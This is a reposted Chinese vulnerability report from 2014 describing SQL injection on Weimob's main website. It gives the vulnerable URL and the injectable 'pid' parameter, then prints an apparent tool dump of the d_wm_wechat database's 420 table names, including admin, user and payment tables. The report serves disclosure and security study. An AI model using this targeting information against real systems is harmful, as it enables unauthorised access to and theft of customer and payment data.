微盟主站SQL注入可至大量信息泄漏下载
-
来源:黑吧安全网 浏览:689次 时间:2014-06-18
微盟主站SQL注入可至大量信息泄漏
#1.微盟一个比较主要的地方存在SQL注入。
www.weimob.com/snsmobile?id=1472&v=555c3efd5c1f6c44004dda76628f25f9&pid=95967&wechat_id=fromUsername
注入参数:
pid
大量数据库,可跨裤查询#2.最主要的数据库,420个表:
Database: d_wm_wechat
[420 tables]
+---------------------------------------+
| funds_bill |
| funds_bill |
| t_wm_activity_sncode |
| t_wm_activity_sncode |
| t_wm_activity_users |
| t_wm_activity_users |
| t_wm_admin |
| t_wm_admin |
| t_wm_agent |
| t_wm_agent |
| t_wm_albums |
| t_wm_albums |
| t_wm_albums_pic |
| t_wm_albums_pic |
| t_wm_announce |
| t_wm_announce |
| t_wm_app_config |
| t_wm_app_config |
| t_wm_big_wheel |
| t_wm_big_wheel |
| t_wm_bindlog |
| t_wm_bindlog |
| t_wm_business |
| t_wm_business |
| t_wm_busness_login_log |
| t_wm_busness_login_log |
| t_wm_car_brand |
| t_wm_car_brand |
| t_wm_car_case |
| t_wm_car_case |
| t_wm_car_case_custom |
| t_wm_car_case_custom |
| t_wm_car_model |
| t_wm_car_model |
| t_wm_car_picfull |
| t_wm_car_picfull |
| t_wm_car_reserve |
| t_wm_car_reserve |
| t_wm_car_reserve_custom |
| t_wm_car_reserve_custom |
| t_wm_car_sell |
| t_wm_car_sell |
| t_wm_car_series |
| t_wm_car_series |
| t_wm_car_set |
| t_wm_car_set |
| t_wm_car_tool |
| t_wm_car_tool |
| t_wm_card_info |
| t_wm_card_info |
| t_wm_card_manager |
| t_wm_card_manager |
| t_wm_cardcare |
| t_wm_cardcare |
| t_wm_cardsent |
| t_wm_cardsent |
| t_wm_channel |
| t_wm_channel |
| t_wm_channel_type |
| t_wm_channel_type |
| t_wm_consume |
| t_wm_consume |
| t_wm_coupons |
| t_wm_coupons |
| t_wm_current_city_region |
| t_wm_current_city_region |
| t_wm_custom_keyword |
| t_wm_custom_keyword |
| t_wm_custom_menu |
| t_wm_custom_menu |
| t_wm_custom_reply_lbs |
| t_wm_custom_reply_lbs |
| t_wm_custom_reply_music |
| t_wm_custom_reply_music |
| t_wm_custom_reply_news |
| t_wm_custom_reply_news |
| t_wm_custom_reply_text |
| t_wm_custom_reply_text |
| t_wm_email_log |
| t_wm_email_log |
| t_wm_email_send_queue |
| t_wm_email_send_queue |
| t_wm_estate_album |
| t_wm_estate_album |
| t_wm_estate_category |
| t_wm_estate_category |
| t_wm_estate_expert |
| t_wm_estate_expert |
| t_wm_estate_house |
| t_wm_estate_house |
| t_wm_estate_impress_system |
| t_wm_estate_impress_system |
| t_wm_estate_impress_user |
| t_wm_estate_impress_user |
| t_wm_estate_picfull |
| t_wm_estate_picfull |
| t_wm_estate_set |
| t_wm_estate_set |
| t_wm_exam |
| t_wm_exam |
| t_wm_exam_question |
| t_wm_exam_question |
| t_wm_exam_sncode |
| t_wm_exam_sncode |
| t_wm_exam_test |
| t_wm_exam_test |
| t_wm_exam_users |
| t_wm_exam_users |
| t_wm_exam_users_logs |
| t_wm_exam_users_logs |
| t_wm_festival_activity |
| t_wm_festival_activity |
| t_wm_festival_user |
| t_wm_festival_user |
| t_wm_food_class |
| t_wm_food_class |
| t_wm_food_combo |
| t_wm_food_combo |
| t_wm_food_dishes |
| t_wm_food_dishes |
| t_wm_food_like |
| t_wm_food_like |
| t_wm_food_order |
| t_wm_food_order |
| t_wm_food_table |
| t_wm_food_table |
| t_wm_food_tags |
| t_wm_food_tags |
| t_wm_grade |
| t_wm_grade |
| t_wm_hotel |
| t_wm_hotel |
| t_wm_hotel_order |
| t_wm_hotel_order |
| t_wm_hotel_room |
| t_wm_hotel_room |
| t_wm_invite_code |
| t_wm_invite_code |
| t_wm_ip |
| t_wm_ip |
| t_wm_log_member_coupons |
| t_wm_log_member_coupons |
| t_wm_logskeyword |
| t_wm_logskeyword |
| t_wm_logsscore |
| t_wm_logsscore |
| t_wm_lotteryticket |
| t_wm_lotteryticket |
| t_wm_market |
| t_wm_market |
| t_wm_market_business_base |
| t_wm_market_business_base |
| t_wm_market_business_info |
| t_wm_market_business_info |
| t_wm_market_business_privilege |
| t_wm_market_business_privilege |
| t_wm_market_business_shop |
| t_wm_market_business_shop |
| t_wm_market_business_tiny |
| t_wm_market_business_tiny |
| t_wm_market_business_vip |
| t_wm_market_business_vip |
| t_wm_market_class |
| t_wm_market_class |
| t_wm_market_member |
| t_wm_market_member |
| t_wm_mcard |
| t_wm_mcard |
| t_wm_mcardreceive |
| t_wm_mcardreceive |
| t_wm_mconsumption |
| t_wm_mconsumption |
| t_wm_media_reports |
| t_wm_media_reports |
| t_wm_member_coupon |
| t_wm_member_coupon |
| t_wm_member_gift |
| t_wm_member_gift |
| t_wm_member_marketing_activity |
| t_wm_member_marketing_activity |
| t_wm_member_program |
| t_wm_member_program |
| t_wm_member_recharge |
| t_wm_member_recharge |
| t_wm_membercard |
| t_wm_membercard |
| t_wm_message |
| t_wm_message |
| t_wm_message_black |
| t_wm_message_black |
| t_wm_message_config |
| t_wm_message_config |
| t_wm_mprivileges |
| t_wm_mprivileges |
| t_wm_new_member |
| t_wm_new_member |
| t_wm_new_member_address |
| t_wm_new_member_address |
| t_wm_new_member_announce |
| t_wm_new_member_announce |
| t_wm_new_member_announce_view |
| t_wm_new_member_announce_view |
| t_wm_new_member_bill |
| t_wm_new_member_bill |
| t_wm_new_member_card |
| t_wm_new_member_card |
| t_wm_new_member_card_coupon |
| t_wm_new_member_card_coupon |
| t_wm_new_member_card_gift |
| t_wm_new_member_card_gift |
| t_wm_new_member_card_recharge |
| t_wm_new_member_card_recharge |
| t_wm_new_member_cardsent |
| t_wm_new_member_cardsent |
| t_wm_new_member_consume_activities |
| t_wm_new_member_consume_activities |
| t_wm_new_member_consume_log |
| t_wm_new_member_consume_log |
| t_wm_new_member_coupon |
| t_wm_new_member_coupon |
| t_wm_new_member_customer_care |
| t_wm_new_member_customer_care |
| t_wm_new_member_define_field |
| t_wm_new_member_define_field |
| t_wm_new_member_define_info |
| t_wm_new_member_define_info |
| t_wm_new_member_entity |
| t_wm_new_member_entity |
| t_wm_new_member_grade |
| t_wm_new_member_grade |
| t_wm_new_member_integral_exchange |
| t_wm_new_member_integral_exchange |
| t_wm_new_member_integral_exchange_log |
| t_wm_new_member_integral_exchange_log |
| t_wm_new_member_messages |
| t_wm_new_member_messages |
| t_wm_new_member_number |
| t_wm_new_member_number |
| t_wm_new_member_privilege |
| t_wm_new_member_privilege |
| t_wm_new_member_recharge_activities |
| t_wm_new_member_recharge_activities |
| t_wm_new_member_recommend |
| t_wm_new_member_recommend |
| t_wm_new_member_score |
| t_wm_new_member_score |
| t_wm_new_member_score_log |
| t_wm_new_member_score_log |
| t_wm_new_member_system_field |
| t_wm_new_member_system_field |
| t_wm_new_receive_coupon |
| t_wm_new_receive_coupon |
| t_wm_notice |
| t_wm_notice |
| t_wm_order_items |
| t_wm_order_items |
| t_wm_outside_link |
| t_wm_outside_link |
| t_wm_panorama |
| t_wm_panorama |
| t_wm_panorama_picture |
| t_wm_panorama_picture |
| t_wm_payment_cfg |
| t_wm_payment_cfg |
| t_wm_payment_sequence |
| t_wm_payment_sequence |
| t_wm_plcaccount |
| t_wm_plcaccount |
| t_wm_privilege_config |
| t_wm_privilege_config |
| t_wm_privilege_role |
| t_wm_privilege_role |
| t_wm_question_cat |
| t_wm_question_cat |
| t_wm_questions |
| t_wm_questions |
| t_wm_reg_config |
| t_wm_reg_config |
| t_wm_reg_customer |
| t_wm_reg_customer |
| t_wm_region |
| t_wm_region |
| t_wm_register |
| t_wm_register |
| t_wm_related_question_cat |
| t_wm_related_question_cat |
| t_wm_reserve |
| t_wm_reserve |
| t_wm_reserve_custom |
| t_wm_reserve_custom |
| t_wm_score |
| t_wm_score |
| t_wm_scratch_card |
| t_wm_scratch_card |
| t_wm_service |
| t_wm_service |
| t_wm_service_config |
| t_wm_service_config |
| t_wm_service_custom |
| t_wm_service_custom |
| t_wm_service_sms |
| t_wm_service_sms |
| t_wm_smash_egg |
| t_wm_smash_egg |
| t_wm_smash_egg_sncode |
| t_wm_smash_egg_sncode |
| t_wm_smashegg_users |
| t_wm_smashegg_users |
| t_wm_sms_history |
| t_wm_sms_history |
| t_wm_sms_log |
| t_wm_sms_log |
| t_wm_spoutlet |
| t_wm_spoutlet |
| t_wm_spoutlet_domain |
| t_wm_spoutlet_domain |
| t_wm_store |
| t_wm_store |
| t_wm_survey |
| t_wm_survey |
| t_wm_survey_options |
| t_wm_survey_options |
| t_wm_survey_userinfo |
| t_wm_survey_userinfo |
| t_wm_survey_useroption |
| t_wm_survey_useroption |
| t_wm_tg_eticket |
| t_wm_tg_eticket |
| t_wm_tg_funds_bill |
| t_wm_tg_funds_bill |
| t_wm_tg_goods |
| t_wm_tg_goods |
| t_wm_tg_goods_attribute |
| t_wm_tg_goods_attribute |
| t_wm_tg_goods_attribute_detail |
| t_wm_tg_goods_attribute_detail |
| t_wm_tg_goods_picture |
| t_wm_tg_goods_picture |
| t_wm_tg_goods_store_related |
| t_wm_tg_goods_store_related |
| t_wm_tg_order |
| t_wm_tg_order |
| t_wm_tg_order_delivery |
| t_wm_tg_order_delivery |
| t_wm_tg_order_delivery_detail |
| t_wm_tg_order_delivery_detail |
| t_wm_tg_order_item |
| t_wm_tg_order_item |
| t_wm_tg_order_refund |
| t_wm_tg_order_refund |
| t_wm_tg_order_refund_detail |
| t_wm_tg_order_refund_detail |
| t_wm_tg_product |
| t_wm_tg_product |
| t_wm_tg_send_sms |
| t_wm_tg_send_sms |
| t_wm_tg_user |
| t_wm_tg_user |
| t_wm_tg_user_address |
| t_wm_tg_user_address |
| t_wm_user |
| t_wm_user |
| t_wm_vote |
| t_wm_vote |
| t_wm_vote_options |
| t_wm_vote_options |
| t_wm_vote_user |
| t_wm_vote_user |
| t_wm_wall |
| t_wm_wall |
| t_wm_wall_bigwheel |
| t_wm_wall_bigwheel |
| t_wm_wall_content |
| t_wm_wall_content |
| t_wm_wall_lottery |
| t_wm_wall_lottery |
| t_wm_wall_photo |
| t_wm_wall_photo |
| t_wm_wall_race |
| t_wm_wall_race |
| t_wm_wall_race_log |
| t_wm_wall_race_log |
| t_wm_wall_user |
| t_wm_wall_user |
| t_wm_wall_vote |
| t_wm_wall_vote |
| t_wm_wall_winner |
| t_wm_wall_winner |
| t_wm_web_desktop_menus |
| t_wm_web_desktop_menus |
| t_wm_webclass |
| t_wm_webclass |
| t_wm_webconfig |
| t_wm_webconfig |
| t_wm_webmenu |
| t_wm_webmenu |
| t_wm_webplugmenu |
| t_wm_webplugmenu |
| t_wm_webslide |
| t_wm_webslide |
| t_wm_weimobpay_logs |
| t_wm_weimobpay_logs |
| t_wm_weimobpay_open_minded |
| t_wm_weimobpay_open_minded |
| t_wm_weimobpay_open_minded_detail |
| t_wm_weimobpay_open_minded_detail |
| t_wm_weimobpay_payment_cfg |
| t_wm_weimobpay_payment_cfg |
| t_wm_weimobpay_sequence |
| t_wm_weimobpay_sequence |
| t_wm_weimobpay_withdrawal |
| t_wm_weimobpay_withdrawal |
| t_wm_weimobpay_withdrawal_detail |
| t_wm_weimobpay_withdrawal_detail |
| t_wm_wp_device |
| t_wm_wp_device |
| t_wm_yldaccount |
| t_wm_yldaccount |
| v_wm_shop_auth |
| v_wm_shop_auth |
+---------------------------------------+